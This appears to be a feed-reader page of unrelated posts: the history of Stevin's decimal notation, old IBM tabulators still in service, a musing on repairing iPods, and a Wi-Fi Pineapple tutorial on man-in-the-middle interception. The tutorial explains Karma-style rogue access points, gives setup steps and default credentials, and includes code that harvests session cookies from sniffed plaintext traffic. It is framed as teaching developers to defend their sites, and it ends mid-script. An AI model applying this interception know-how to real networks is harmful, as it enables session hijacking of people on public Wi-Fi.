The numerical stand-ins in the Reisch book with which Pythagoras worked were blank, coin-like slugs used as placeholders, and would be used in place of rocks or pebbles or whatever other material was at hand. It is interesting to note that the Latin expression "calculos ponere", which basically means "to calculate" or "to compute", is more literally translated as "to set counters" or "to place pebbles" (upon a counting board), or to set an argument², which is exactly what some of the Roman daily reckoners would do at their work. And also used, in this case, by the unhappy Pythagoras.

The foundation for the .14159... that comes to the right of the integer 3 in pi is a relatively recent idea in the history of mathematics--at least so far as the representation of the idea in numbers and the decimal point is concerned. 

Simon Stevin (1548-1620) introduced the idea of decimal numbers in his 36-page De Thiende ("The Art of Tenths"¹) in 1585, an idea that replaced much more cumbersome earlier methods of representation.  So the number 3.14159 would be written in Stevin's notation as 3[0]1[1]4[2]1[3]5[4]9[5], where each bracketed number, e.g. "[9]", was printed as a digit within a circle.  It is also seen here:

[Image: Stevin's decimal notation. Source: Math Words]

[Image: page from De Thiende; full text available online]

The importance of the introduction of this idea is difficult to overestimate, as for example The Princeton Companion to Mathematics (edited by Timothy Gowers) puts it:

The Flemish mathematician and engineer Simon Stevin is remembered for his study of decimal fractions. Although he was not the first to use decimal fractions (they are found in the work of the tenth-century Islamic mathematician al-Uqlidisi), it was his tract De Thiende ("The tenth"), published in 1585 and translated into English (as Disme: The Art of Tenths, or Decimall Arithmetike Teaching) in 1608, that led to their widespread adoption in Europe. Stevin, however, did not use the notation we use today. He drew circles around the exponents of the powers of one tenth: thus he wrote 7.3486 as 7⓪3①4②8③6④. In De Thiende Stevin not only demonstrated how decimal fractions could be used but also advocated that a decimal system should be used for weights and measures and for coinage.

This idea would be further developed by Bartholomeus Pitiscus (1561-1613), who was the first to introduce the decimal point, in 1612³.   It was a far more robust and simple way of dealing with decimal notation than anything that had come before.
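To make the notation concrete, here is an added example (not from the original post) that converts between a modern decimal numeral and Stevin's notation, using the bracket form used above in place of the circled exponents, and evaluates the result exactly as the sum of digit times power of one tenth that the exponents denote. The function names are my own.

```python
import re
from fractions import Fraction

# Added example: Stevin's De Thiende notation, written with brackets in place of
# the circled exponents, e.g. 3.14159 -> 3[0]1[1]4[2]1[3]5[4]9[5].
GROUP = re.compile(r"(\d+)\[(\d+)\]")


def to_stevin(decimal):
    """Rewrite a non-negative decimal numeral in Stevin's notation.

    Each digit is followed by the exponent of the power of one tenth it stands for:
    the integer part carries [0] (the 'commencement'), tenths [1], hundredths [2], ...
    """
    whole, _, frac = decimal.strip().partition(".")
    if not whole.isdigit() or (frac and not frac.isdigit()):
        raise ValueError(f"not a non-negative decimal numeral: {decimal!r}")
    groups = [f"{int(whole)}[0]"]
    groups += [f"{d}[{i}]" for i, d in enumerate(frac, start=1)]
    return "".join(groups)


def from_stevin(text):
    """Parse Stevin notation back to a modern decimal string.

    Rejects stray characters, exponents that do not run 0, 1, 2, ... without gaps,
    and multi-digit groups in the fractional positions.
    """
    groups = GROUP.findall(text)
    if not groups or "".join(f"{d}[{e}]" for d, e in groups) != text.replace(" ", ""):
        raise ValueError(f"not Stevin notation: {text!r}")
    if [int(e) for _, e in groups] != list(range(len(groups))):
        raise ValueError("exponents must be consecutive and start at 0")
    if any(len(d) != 1 for d, _ in groups[1:]):
        raise ValueError("each tenth, hundredth, ... position holds one digit")
    whole = groups[0][0]
    frac = "".join(d for d, _ in groups[1:])
    return f"{whole}.{frac}" if frac else whole


def stevin_value(text):
    """Exact value of a Stevin numeral: sum of digit * (1/10)^exponent."""
    from_stevin(text)  # validate first
    return sum(Fraction(int(d), 10 ** int(e)) for d, e in GROUP.findall(text))


if __name__ == "__main__":
    for n in ("3.14159", "7.3486", "42"):
        s = to_stevin(n)
        print(n, "->", s, "->", from_stevin(s), "=", stevin_value(s))
```

The round trip is exact because the notation is positional in the same way ours is; the only thing Stevin lacked was a way to mark the boundary with a single symbol, which is what Pitiscus's point supplies.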

Notes:

1. Decimal arithmetic: Teaching how to perform all computations whatsoever by whole numbers without fractions, by the four principles of common arithmetic: namely, addition, subtraction, multiplication, and division

2. The Reisch book is remarkable: it is basically a Renaissance encyclopedia of general knowledge, divided into twelve books:  grammar, dialectics, rhetoric, arithmetic, music, geometry, astronomy, physics, natural history, physiology, psychology,  and ethics.

3. Pitiscus was also the first to introduce the term "trigonometry", in a highly important and influential work he produced in 1595.

17 Apr 13:18

If It Ain't Broke, Don't Fix It: Ancient Computers in Use Today

It’s easy to wax nostalgic about old technology--to remember fondly our first Apple IIe or marvel at the old mainframes that ran on punched cards. But no one in their right mind would use those outdated, underpowered dinosaurs to run a contemporary business, let alone a modern weapons system, right?

Wrong!

While much of the tech world views a two-year-old smartphone as hopelessly obsolete, large swaths of our transportation and military infrastructure, some modern businesses, and even a few computer programmers rely daily on technology that hasn’t been updated for decades.

If you’ve recently bought a MetroCard for the New York City Subway or taken money from certain older ATMs, for instance, your transaction was made possible by IBM’s OS/2, an operating system that debuted 25 years ago and faded out soon after.

A recent federal review found that the U.S. Secret Service uses a mainframe computer system from the 1980s. That system apparently works only 60 percent of the time. Here’s hoping that uptime statistics are better for the ancient minicomputers used by the U.S. Department of Defense for the Minuteman Intercontinental Ballistic Missile system, Navy submarines, fighter jets, and other weapons programs. Those systems, according to the consultants who help keep them going, will likely be used until at least the middle of this century.

Here are a few stories of the computers that time forgot, and the people and institutions that stubbornly hold on to them.

Punch-Card Accounting

Sparkler Filters of Conroe, Texas, prides itself on being a leader in the world of chemical process filtration. If you buy an automatic nutsche filter from them, though, they’ll enter your transaction on a “computer” that dates from 1948.

Sparkler Filters' IBM 402, with self-employed field engineer Duwayne Leafley in the foreground. (Photo Courtesy Ed Thelen / IBM 1401 Group)
Sparkler’s IBM 402 is not a traditional computer, but an automated electromechanical tabulator that can be programmed (or more accurately, wired) to print out certain results based on values encoded into stacks of 80-column Hollerith-type punched cards.

Companies traditionally used the 402 for accounting, since the machine could take a long list of numbers, add them up, and print a detailed written report. In a sense, you could consider it a 3000-pound spreadsheet machine. That's exactly how Sparkler Filters uses its IBM 402, which could very well be the last fully operational 402 on the planet. As it has for over half a century, the firm still runs all of its accounting work (payroll, sales, and inventory) through the IBM 402. The machine prints out reports on wide, tractor-fed paper.

The punched cards used in the 402, with some mangled cards from a recently cleared jam in the card reader. The cards sit on the IBM 029 key-punch machine. (Photo Courtesy Ed Thelen / IBM 1401 Group)

Of course, before the data goes into the 402, it must first be encoded into stacks of cards. A large IBM 029 key-punch machine--which resembles a monstrous typewriter built into a desk--handles that task.
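Sparkler's data path starts with the 029 key punch turning characters into holes in an 80-column card. The encoding is the Hollerith alphanumeric code: digits are a single hole in rows 0 to 9, letters combine one of the zone rows (12, 11 or 0) with a digit row, and a space is no hole at all. The following is an added example for this page, not software connected with Sparkler Filters or the IBM 1401 Group. It encodes a record onto a card, renders the card, and reads it back, rejecting undefined hole patterns such as those on the mangled cards in the photo. The sample record is constructed.

```python
# Added example: Hollerith encoding of one 80-column punched card.
# Card rows as printed on a standard IBM card, top to bottom: zone rows 12 and 11, then 0-9.
ROWS = ["12", "11", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
CARD_COLUMNS = 80


def _build_code():
    """Hollerith alphanumeric code (IBM 029 subset): letters, digits and space."""
    code = {" ": frozenset()}                      # space: no punch
    for d in "0123456789":
        code[d] = frozenset({d})                   # digit: one punch in its own row
    for i, ch in enumerate("ABCDEFGHI", start=1):
        code[ch] = frozenset({"12", str(i)})      # A-I: zone 12 + digit 1-9
    for i, ch in enumerate("JKLMNOPQR", start=1):
        code[ch] = frozenset({"11", str(i)})      # J-R: zone 11 + digit 1-9
    for i, ch in enumerate("STUVWXYZ", start=2):
        code[ch] = frozenset({"0", str(i)})       # S-Z: zone 0 + digit 2-9
    return code


ENCODE = _build_code()
DECODE = {punches: ch for ch, punches in ENCODE.items()}


def punch_card(text):
    """Encode one record onto a card: a list of 80 frozensets naming the punched rows."""
    text = text.upper()
    if len(text) > CARD_COLUMNS:
        raise ValueError(f"record is {len(text)} characters; a card holds {CARD_COLUMNS}")
    columns = []
    for ch in text.ljust(CARD_COLUMNS):
        if ch not in ENCODE:
            raise ValueError(f"no Hollerith code for {ch!r} in this table")
        columns.append(ENCODE[ch])
    return columns


def read_card(columns):
    """Decode a card; a hole pattern the code does not define (a mangled card) is an error."""
    chars = []
    for i, punches in enumerate(columns):
        if punches not in DECODE:
            raise ValueError(f"column {i + 1}: undefined punch combination {sorted(punches)}")
        chars.append(DECODE[punches])
    return "".join(chars).rstrip()


def render_card(columns):
    """ASCII picture of the card, one line per row, 'O' where a hole is punched."""
    return "\n".join(
        f"{row:>2} " + "".join("O" if row in col else "." for col in columns) for row in ROWS
    )


if __name__ == "__main__":
    card = punch_card("SPARKLER FILTERS 1948")  # constructed sample record
    print(render_card(card))
    print(read_card(card))
```

The reader deliberately refuses anything outside the table rather than guessing: a card jam that tears an extra hole produces a combination the 402's wiring never expected, and failing loudly on it is exactly the behaviour you want before a batch of summary cards is punched from bad input.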

Carl Kracklauer, whose father founded Sparkler Filters in 1927, usually types the data onto the punch cards. The company sticks with the 402 because it's a known entity: Staffers know how to use it, and they have over 60 years of company accounting records formatted for the device.

The key punch isn't the only massive accessory in Sparkler's arsenal. The 402 also links to an IBM 514 Reproducing Punch, which has been broken for three years. When it works properly, the 514 spits out punched "summary cards," which typically contain the output of the 402's operation (such as sum totals) for later reuse. Sparkler stores all of its punched data cards--thousands and thousands of them--in stacks of boxes.

Sparkler Filters' collection of IBM 402 programs on IBM plugboards. (Photo Courtesy Ed Thelen / IBM 1401 Group)

The company also possesses dozens of 402 programs in the form of IBM plugboards. Computer programming in the 1940s commonly involved arranging hundreds of individual wires in a way that would likely drive a modern software engineer insane. In the 402's case, a spaghetti-like pattern of wires attached to hundreds of connectors on each plugboard determines the operation of the machine, and different plugboards can be pulled out and replaced as if they were interchangeable software disks. So you might insert one plugboard for handling, say, accounts receivable, and a different one for inventory management.

Sparkler’s 402 is such a significant computing relic that the Computer History Museum in Mountain View, California, sent a delegation to the company last year to try to convince its executives to move to a more modern accounting system and donate the 402 to the museum. That will someday be an appropriate resting place for the 402, but as long as it still does its duty, the Texas company has no problem keeping its digital dinosaur living a little while longer.

Next: Modern military weapons run on ancient minicomputers.

11 Apr 00:32

Will we be repairing our iPods a hundred years from now?

by Jacob

Well, in a hundred years, I’ll probably be dead (“Lost off the coast of … in a hurricane”), so this question is mainly relevant for our descendants [for those of you who have such].

In a recent post on the future, frugal bachelor commented:

I doubt the IPOD will be repaired in any conventional sense; yes, the raw materials are valuable, but it will make more sense to melt the whole thing down and recreate it from scratch. If in 100 years people will take apart an IPOD, have a soldering iron and hook up an oscilloscope, then we are truly screwed.

Now, it is quite possible that we are truly screwed. I will consider the peak oil predictions well known. Usually, economists, politicians, computer scientists, and other people with no grasp of reality will comment that the economy can grow regardless of falling energy output; this is referred to as reducing the energy intensity of the economy. True, if you outsource the energy costs to other countries.

The fact is that running electronics is quite cheap. However, building said electronics, microchips in particular (let’s have a moment of silence for PV panels), is enormously expensive in terms of energy. Depending on exactly how high the price of energy goes, we may very well see a salvage operation and a repair of consumer electronics that goes beyond today’s efforts. And once those chips die, you might not see another one.


17 Apr 10:26

The beginners guide to breaking website security with nothing more than a Pineapple

by Troy Hunt

You know how security people get all uppity about SSL this and SSL that? Stuff like posting creds over HTTPS isn’t enough, you have to load login forms over HTTPS as well and then you can’t send auth cookies over HTTP because they’ll get sniffed and sessions hijacked and so on and so forth. This is all pretty much security people rhetoric designed to instil fear but without a whole lot of practical basis, right?

That’s an easy assumption to make because it’s hard to observe the risk of insufficient transport layer protection being exploited, at least compared to something like XSS or SQL injection. But it turns out that exploiting unprotected network traffic can actually be extremely simple, you just need to have the right gear. Say hello to my little friend:

 

Wi-Fi Pineapple

This, quite clearly, is a Pineapple. But it’s not just any pineapple, it’s a Wi-Fi Pineapple and it has some very impressive party tricks that will help the naysayers understand the real risk of insufficient transport layer protection in web applications which, hopefully, will ultimately help them build safer sites. Let me demonstrate.

What is this “Pineapple” you speak of?!

What you’re looking at in the image above is a little device about the size of a cigarette packet running a piece of firmware known as “Jasager” (German for “The Yes Man”) based on OpenWrt (think of it as Linux for embedded devices). Selling for only $100, it packs Wi-Fi capabilities, a USB jack, a couple of RJ45 Ethernet connectors and implements a kernel-mode wireless feature known as “Karma”.

Huh? This is starting to slip into the realm of specialist security gear which is increasingly far away from the everyday issues we deal with as software developers. But it’s exceptionally important because it helps us understand in very graphic terms what the risk of insufficient transport layer protection really is.

The easiest way to think of the Pineapple is as a little device that sits between an unsuspecting user’s PC (or iPhone or other internet connected device) and the resource they’re attempting to access. What this means is that an attacker is able to launch a “Man in the Middle” or MiTM attack by inspecting the data that flows between the victim and any resources they’re accessing on the web. The physical design of the Pineapple means that victims can connect to it via its Wi-Fi adapter and it can connect to a PC with an internet connection via the physical Ethernet adapter. It all looks a bit like this:

Launching an MiTM attack with the Pineapple

This isn’t the only way of configuring the thing, but being tethered to the attacker’s PC is the easiest way of understanding how it works. The point of all this is that it helps tremendously in understanding the risk of insufficient transport layer protection because ultimately, it’s websites that don’t do a good enough job of this that put the victim at risk. More on that later.
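What a man in the middle actually gets from insufficient transport layer protection is easy to show on the wire. The Python below is an added example written for this page, not code from Troy's post or from the Pineapple. It takes constructed TCP payloads of the kind the Pineapple relays for a victim: a plaintext HTTP request carrying session cookies, the first bytes of a TLS handshake, and a server response that sets cookies. It harvests the session cookies a passive sniffer can read, shows that the TLS payload yields nothing, and includes the check a site owner would run against their own responses: any Set-Cookie issued without the Secure flag will be sent by the browser over plain HTTP later, even if the cookie itself was set over HTTPS. The cookie names ASP.NET_SessionId and .ASPXAUTH are the real ASP.NET defaults; the host, the cookie values and the session-name heuristic are assumptions for the demonstration.

```python
import re

# Added example: what a MiTM harvests from plaintext HTTP, and the server-side check that prevents it.
SESSION_NAMES = {"ASP.NET_SessionId", ".ASPXAUTH", "PHPSESSID", "JSESSIONID", "connect.sid"}
REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/1\.[01]$")


def parse_http(payload):
    """Split a plaintext HTTP message into (start line, {lower-case header: [values]}).

    Returns None when the bytes are not HTTP, e.g. a TLS record, which is opaque to the sniffer.
    """
    head, _, _ = payload.partition(b"\r\n\r\n")
    try:
        lines = head.decode("ascii").split("\r\n")
    except UnicodeDecodeError:
        return None
    start = lines[0]
    if not (start.startswith("HTTP/") or REQUEST_LINE.match(start)):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return start, headers


def is_session_cookie(name):
    """Heuristic (assumption): well-known framework names, or anything that smells like a session/auth token."""
    return name in SESSION_NAMES or re.search(r"sess|auth|token", name, re.I) is not None


def harvest_sessions(payloads):
    """Attacker's view: (host, cookie name, value) for every session cookie a client sent in the clear."""
    found = []
    for payload in payloads:
        parsed = parse_http(payload)
        if not parsed or parsed[0].startswith("HTTP/"):   # not HTTP, or a response: skip
            continue
        _, headers = parsed
        host = headers.get("host", ["?"])[0]
        for cookie_header in headers.get("cookie", []):
            for pair in cookie_header.split(";"):
                name, _, value = pair.strip().partition("=")
                if is_session_cookie(name):
                    found.append((host, name, value))
    return found


def insecure_set_cookies(response):
    """Defender's check: names of cookies set without the Secure flag, so a browser will replay them over HTTP."""
    parsed = parse_http(response)
    if not parsed or not parsed[0].startswith("HTTP/"):
        return []
    bad = []
    for set_cookie in parsed[1].get("set-cookie", []):
        name_value, *attrs = [part.strip() for part in set_cookie.split(";")]
        if "secure" not in {a.lower() for a in attrs}:
            bad.append(name_value.partition("=")[0])
    return bad


# Constructed samples of what the Pineapple would relay for a victim on its open AP.
HTTP_REQUEST = (
    b"GET /account HTTP/1.1\r\nHost: example.com\r\n"
    b"Cookie: theme=dark; ASP.NET_SessionId=1f2e3d4c5b6a; .ASPXAUTH=deadbeef\r\n\r\n"
)
TLS_CLIENT_HELLO = bytes.fromhex("160301002a010000260303") + bytes(range(0x80, 0x9F))
HTTP_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: ASP.NET_SessionId=1f2e3d4c5b6a; Path=/; HttpOnly\r\n"
    b"Set-Cookie: .ASPXAUTH=deadbeef; Path=/; Secure; HttpOnly\r\n\r\n"
)

if __name__ == "__main__":
    print("harvested:", harvest_sessions([HTTP_REQUEST, TLS_CLIENT_HELLO]))
    print("set without Secure:", insecure_set_cookies(HTTP_RESPONSE))
```

The asymmetry is the whole point of the post: the attacker needs nothing but a position on the path, while the fix sits entirely with the site (HTTPS for every request that carries the cookie, plus the Secure flag so the browser never sends it in the clear). HttpOnly, shown on both cookies, protects against script access but does nothing against a sniffer.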

But why on earth would a victim connect to the Pineapple in the first place?! Well firstly, we’ve become alarmingly accustomed to connecting to random wireless access points whilst we’re out and about. When the average person is at the airport waiting for a flight and sees an SSID named “Free Airport Wi-Fi”, what are they going to do? Assume it’s an attacker’s honeypot and stay away from it or believe that it’s free airport Wi-Fi and dive right in? Exactly.

But of course that’s still a very conscious decision on behalf of the user. As it turns out, the Pineapple packs a much more subversive party trick to lure unsuspecting victims in…

Karma, baby

The Karma feature is best explained on the Pineapple website:

Most wireless devices including laptops, tablets and smartphones have network software that automatically connects to access points they remember. This convenient feature is what gets you online without effort when you turn on your computer at home, the office, coffee shops or airports you frequent. Simply put, when your computer turns on, the wireless radio sends out probe requests. These requests say "Is such-and-such wireless network around?" The WiFi Pineapple Mark IV, powered by Jasager -- German for "The Yes Man" -- replies to these requests to say "Sure, I'm such-and-such wireless access point - let's get you online!"

Wait, what?! So devices just randomly connect to the Pineapple thinking it’s a legitimate AP? Yep, here it is in detail:

Karma saying it is the device's preferred network

Simple, huh? The problem is that wireless devices are just too damn trusting. Once they establish a connection with an access point they usually happily reconnect to it at a later date. Of course if it’s a protected network they still need to have the right wireless credentials, but if it’s an open network then the Pineapple asks for no such thing, it just lets the device straight in whether the device thinks it’s connecting to a legitimate access point or not.
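The “Yes Man” behaviour described above is also what gives Karma away on the air: a genuine access point answers probes for its own SSID, while a Karma access point answers, from one BSSID, for whatever SSID each client asks about. The following is an added example written for this page, not code from Troy's post or from the Pineapple firmware. It builds a few raw 802.11 probe request and probe response frames (constructed sample data, without radiotap header or FCS), parses them with the standard library only, and flags any BSSID that has claimed three or more different open SSIDs. The MAC addresses, SSIDs and the threshold are assumptions for the demonstration.

```python
import struct
from collections import defaultdict

# Added example: spotting a Karma-style "Yes Man" access point from probe traffic.
PROBE_REQ = 4            # 802.11 management subtype: client asks "is <ssid> around?"
PROBE_RESP = 5           # management subtype: AP answers "yes, that's me"
SSID_IE = 0              # information element tag for the SSID
CAP_PRIVACY = 0x0010     # capability bit set when the AP requires WEP/WPA


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _header(subtype, da, sa, bssid):
    """24-byte management header: frame control, duration, addr1..3, sequence control."""
    frame_control = subtype << 4          # protocol version 0, type 0 (management)
    return struct.pack("<HH", frame_control, 0) + da + sa + bssid + struct.pack("<H", 0)


def build_probe_request(sa, ssid):
    """Directed probe request as a device sends for every network it remembers (broadcast DA/BSSID)."""
    body = bytes([SSID_IE, len(ssid)]) + ssid.encode()
    body += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])   # supported rates IE: 1, 2, 5.5, 11 Mbit/s (basic)
    return _header(PROBE_REQ, b"\xff" * 6, sa, b"\xff" * 6) + body


def build_probe_response(bssid, da, ssid, privacy=False):
    """Probe response: timestamp, beacon interval, capability info, then the SSID IE."""
    capability = CAP_PRIVACY if privacy else 0
    body = struct.pack("<QHH", 0, 100, capability) + bytes([SSID_IE, len(ssid)]) + ssid.encode()
    return _header(PROBE_RESP, da, bssid, bssid) + body


def parse(frame):
    """Return the fields we care about for probe requests/responses, or None for other frames."""
    (frame_control,) = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (frame_control >> 2) & 0x3, (frame_control >> 4) & 0xF
    if ftype != 0 or subtype not in (PROBE_REQ, PROBE_RESP):
        return None
    sa, bssid = frame[10:16], frame[16:22]
    offset, privacy = 24, None
    if subtype == PROBE_RESP:
        _, _, capability = struct.unpack_from("<QHH", frame, offset)
        privacy = bool(capability & CAP_PRIVACY)
        offset += 12
    ssid = None
    while offset + 2 <= len(frame):                 # walk the tagged parameters
        tag, length = frame[offset], frame[offset + 1]
        if tag == SSID_IE:
            ssid = frame[offset + 2:offset + 2 + length].decode(errors="replace")
            break
        offset += 2 + length
    return {"subtype": subtype, "sa": mac_str(sa), "bssid": mac_str(bssid), "ssid": ssid, "privacy": privacy}


def detect_karma(frames, threshold=3):
    """{bssid: sorted SSIDs} for every BSSID that answered probes for >= threshold different open SSIDs."""
    answered = defaultdict(set)
    for frame in frames:
        p = parse(frame)
        if p and p["subtype"] == PROBE_RESP and p["ssid"] and p["privacy"] is False:
            answered[p["bssid"]].add(p["ssid"])
    return {bssid: sorted(ssids) for bssid, ssids in answered.items() if len(ssids) >= threshold}


# Constructed capture: one client probing for three remembered open networks, a Karma AP saying
# yes to all of them, and an honest AP answering only for the network it actually serves.
CLIENT = mac("02:00:00:00:00:01")
HONEST_AP = mac("02:aa:aa:aa:aa:aa")
KARMA_AP = mac("02:bb:bb:bb:bb:bb")
CAPTURE = []
for remembered in ("Free Airport Wi-Fi", "HomeNet", "CoffeeShop"):
    CAPTURE.append(build_probe_request(CLIENT, remembered))
    CAPTURE.append(build_probe_response(KARMA_AP, CLIENT, remembered))   # "Sure, I'm such-and-such"
CAPTURE.append(build_probe_response(HONEST_AP, CLIENT, "HomeNet"))

if __name__ == "__main__":
    print(detect_karma(CAPTURE))
```

A real access point serving several SSIDs normally uses a distinct BSSID for each, so one BSSID claiming many open networks is a strong signal; raise the threshold in dense environments. The check only looks at open networks because that is all Karma can impersonate without the credentials, which is exactly the limitation the paragraph above describes.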

So that’s how she works: a combination of simply providing an access point that victims connect to of their own free will, or tricking them into connecting via Karma. Let’s get it set up and see it all in action.

Windows tethering

The easiest way to access the device and get started with configuring everything is to tether it to a PC with two network interfaces. This can be one with a couple of NICs connected to Ethernet or in most cases (and as with the diagram above), a laptop which commonly has a wired NIC and a wireless one.

What we’re going to do is configure the wired Ethernet NIC which we’ll plug the Pineapple into then share the connection on the wireless adapter so that the traffic from the Pineapple can be routed through it, effectively just passing everything through the PC. This is all pretty straight forward and it starts out from the Network Connections settings:

Network Connections in Windows

Just one little note before proceeding: I’m going to obfuscate any SSIDs or MAC addresses used in this post with a grey box simply because they explicitly tie back to my devices (or my neighbours’ devices!) and I’m not really keen on publicly identifying them. Who knows what they might get up to in future…

Jump into the properties of the wireless adapter, and head over to the sharing tab then make sure that “Allow other network users to connect through this computer’s Internet connection” is checked:

Allow other network users to connect through this computer’s Internet connection

That’s that adapter done, now let’s do the wired one. Jump into the properties and locate the “Internet Protocol Version 4 (TCP/IPv4)” item:

Internet Protocol Version 4 (TCP/IPv4)

Now grab the properties of that guy and configure a static IP address and subnet mask and set the DNS server as follows:

Static IP address on 172.16.42.42, subnet mask on 255.255.255.0 and DNS on 8.8.8.8

That’s it – job done.

Accessing the device

Once tethering is setup and the Pineapple is connected to Ethernet via its PoE LAN port, you should be able to access the Pineapple directly from within your browser via the IP address. You can hit it on 172.16.42.1/pineapple or if running a newer version of the firmware (more on that later), the IP address and port 172.16.42.1:1471. All things going well, you’ll be challenged to authenticate:

Authenticating to the Pineapple

The default credentials are username “root” and password “pineapplesareyummy” after which you should be in:

The Pineapple browser UI

That’s the first bit done, tethering is working and we can actually access the device, now for a bit of preparation.

Housekeeping

Before you start anything, get the firmware up to date. If I’m honest, I’m always scared about updating any firmware on any device because when it goes wrong it’s often a whole world of pain to get yourself back out of trouble again. You’re much better off doing this before you create any dependencies on the device or configure anything. I had a couple of glitches doing mine and it took a few goes, but in theory, you jump over to the “Upgrade” link on the nav, hit “Check for Upgrades” then if required, pull down a package, enter the MD5 hash of it (provided on the upgrade site) and upload the package:

The upgrade interface

One little thing you want to remember here: if like me, your GUI was originally accessed via 172.16.42.1/pineapple, keep in mind the newer version of the firmware now puts the GUI behind a port so you want to hit 172.16.42.1:1471 instead. If, also like me, you try hitting the old address after the install and reboot you’ll keep getting redirected and not much will happen. Then you’ll think you’ve rooted your device (that’s the Australian rooted, not the American one) and start wondering how in the hell you’re ever going to get it back to a known good state and, well, just remember the port change!

Next up, jump into configuration and change the default SSID. The device is configured to show “pineapple” followed by the first and last octets of the Wi-Fi adapter’s MAC address. Change it to something a little more subtle and make it persistent so that when you fire it back up later you’re not reverting to the default:

Changing the SSID

The other thing you want to do on the configuration page is to blacklist the MAC address of the machine you’re going to be orchestrating the Pineapple from and any other devices you don’t want inadvertently connecting to it. This is important if you don’t want to “Pineapple yourself”! Seriously though, it can get very confusing otherwise so this makes good sense.

Blacklisting a MAC address

Lastly, let’s change that default password, the last thing you want is someone else taking over your Pineapple whilst you’re pretending to be a l33t hax0r! Over to the “Advanced” link then down to the bottom of the page:

Changing the default password

That’s pretty much it for what I felt needed to be configured via the UI; let’s go and get a bit low-level and enter the command shell.

SSH’ing in

This is where it gets a bit scary for Windows people! Keeping in mind that the Pineapple is ultimately just a little Linux box with some fancy party tricks, there are times when you’ll need to get your hands dirty and enter the secure shell world. This is something I do very, very rarely and if memory serves me correctly, it was 1999 when I last regularly used a *nix machine so it was pretty unfamiliar territory for me as well.

Moving on, one of the easiest ways of SSH’ing into the device from Windows is to go and grab PuTTY. With this in hand, the only configuration you need is the IP address of the device:

Using PuTTY to SSH into the Pineapple

Open the connection and you’re into the shell:

Into SSH mode on the Pineapple

Follow the instructions in the screen above enough times and suddenly the shell doesn’t seem to look so bad!

Keep in mind that this is the OpenWrt distro of Linux and being intended for embedded devices, it’s a pretty lean edition. Don’t expect to find all the features you’d normally see in a full blown desktop edition – many of them are not there so keep that in mind when attempting to use commands that might not be supported.

Once you’re SSH’d in you can go ahead and set the time and time zone correctly. This’ll be well outside your comfort zone if Linux shells are a bit foreign to you (and admittedly I had to look much of this up again), so here’s the whole thing step-by-step:

  1. Change the directory to /etc/config: cd /etc/config
  2. Edit the config file in vi: vi config
  3. Navigate down to the “option timezone” line and delete out the existing “UTC” value (unless, of course, you are in the UTC time zone!)
  4. Jump over to the timezones table on the OpenWrt site and find the appropriate one for your location.
  5. Enter the value from the “TZ string” column into the shell: Hit the “i” key to insert then type away

    It should look kinda like this when you’re done:

    New timezone
  6. Save the file: Hit the esc key to stop editing then :wq<enter>
  7. Reboot the Pineapple: reboot <enter>

A little tip for new players: every time I tried saving the config change I got the following message and nothing actually saved:

Error when saving timezone

This, quite clearly, means that there is no available capacity on the device, and after wasting considerable time trying to work out why I couldn’t use vi correctly, this became quite clear. Welcome to Linux!

Working with ext4 format and USB drives

You’ve got very little space on the device: there’s literally only an 8MB ROM and 32MB of RAM, so by the time you load everything required just for the device to run, there’s not much left. It’s certainly not going to be enough to start doing fancy things like storing packet captures, which mount up very quickly.

Fortunately it’s all expandable via USB, so one of the first things you want to do is grab a spare thumb drive and get it ready for the Pineapple. But there’s a catch: as with many things Linux, this is a slightly different world to good old Windows, so you can’t just take your NTFS-formatted USB stick and chuck it in; you’ll need to partition and format it as ext4.

In theory, this is easy enough to do in the Windows world using a tool such as MiniTool Partition Wizard. That sounds just fine, except it isn’t, and you will only discover this by either banging your head against the wall for hours or reading what comes next. Whilst the aforementioned tool (and I assume others like it running on Windows) seemed like a good idea, I just couldn’t get it to play nice. I’ll spare you the details as I’ve captured them all on the Hak5 forum, but in short, the USB drive would mount and be readable from the shell but I could never install Infusions to it (think of them as apps for the Pineapple; I’ll come to them shortly). It turned out that additional partitions were being created, and that alone stopped the Pineapple from using the drive, with no obvious warning to that effect.

The solution turned out to be creating the ext4 partition directly from a Linux machine. If this world is unfamiliar to you, there’s a (relatively) low-friction route via an Ubuntu LiveCD: download an Ubuntu ISO, burn it to CD (or DVD, or write it to a bootable USB stick), boot an in-memory instance of Ubuntu and partition the USB drive from there. I then followed the OpenWrt guidance on enabling USB mass storage with a swap partition, which is very easy to follow; the swap partition looks like it will come in handy later on when you want to start doing other tricks with the Pineapple.

That sounds like a hassle – running up an entire new operating system just to partition a USB drive – and certainly it was a drama getting to the point of realising that’s what I needed to do, but once you know what needs to be done it’s quite simple. Of course it would have been even simpler if I had a handy Linux machine hanging around somewhere and for many people, that will already be the case.
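As an added example (mine, not from the original post or the OpenWrt guide), this script does the partitioning from a Linux box and then verifies that the stick carries exactly one ext4 partition and one swap partition and nothing else, which is the check that would have exposed the extra partitions the Windows tool left behind. It assumes the stick is /dev/sdb (confirm with lsblk first, because the script wipes it), a 256 MB swap partition, and a util-linux sfdisk of 2.26 or newer for the script syntax; on an older live CD, parted or GParted can produce the same two-partition layout and the check function still applies.

```shell
#!/bin/sh
# Added example, not from the original post: from a Linux box (the Ubuntu
# live session described above will do), partition a USB stick for the
# Pineapple as one ext4 data partition plus one swap partition, then verify
# that this is the ONLY thing on it. Stray extra partitions were what broke
# Infusion installs with the Windows tool, so the check is the point.
#
# Assumptions (not from the post): the stick is /dev/sdb (confirm with lsblk
# first; this wipes it), swap is 256 MB, and sfdisk is util-linux 2.26 or
# newer (script input with the L/S type aliases).

# Summarise blkid output passed in $1 as "<ext4> <swap> <other>" counts.
# Pure function of its input, so it can be checked without a real device.
count_partition_types() {
  printf '%s\n' "$1" | awk '
    $1 ~ /^\/dev\// {
      if ($0 ~ /TYPE="ext4"/)      e++
      else if ($0 ~ /TYPE="swap"/) s++
      else                          o++
    }
    END { printf "%d %d %d\n", e + 0, s + 0, o + 0 }'
}

# The layout the Pineapple is happy with: exactly one ext4, one swap, nothing else.
layout_ok() {
  [ "$(count_partition_types "$1")" = "1 1 0" ]
}

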